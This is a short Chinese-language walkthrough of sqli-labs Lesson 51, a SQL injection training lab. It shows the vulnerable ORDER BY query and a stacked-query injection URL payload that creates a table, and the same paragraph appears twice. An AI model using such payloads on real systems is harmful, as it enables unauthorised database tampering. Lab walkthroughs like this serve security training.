Less-51
执行的sql语句:
$sql="SELECT * FROM users ORDER BY '$id'";
这里和上一关基本上相同,唯一的区别就是加了一个单引号,这里我们直接构建payload如下:
http://192.168.11.136/sqli-labs/Less-51?sort=1';create table hps like users--+
执行的sql语句:
$sql="SELECT * FROM users ORDER BY '$id'";
这里和上一关基本上相同,唯一的区别就是加了一个单引号,这里我们直接构建payload如下:
http://192.168.11.136/sqli-labs/Less-51?sort=1';create table hps like users--+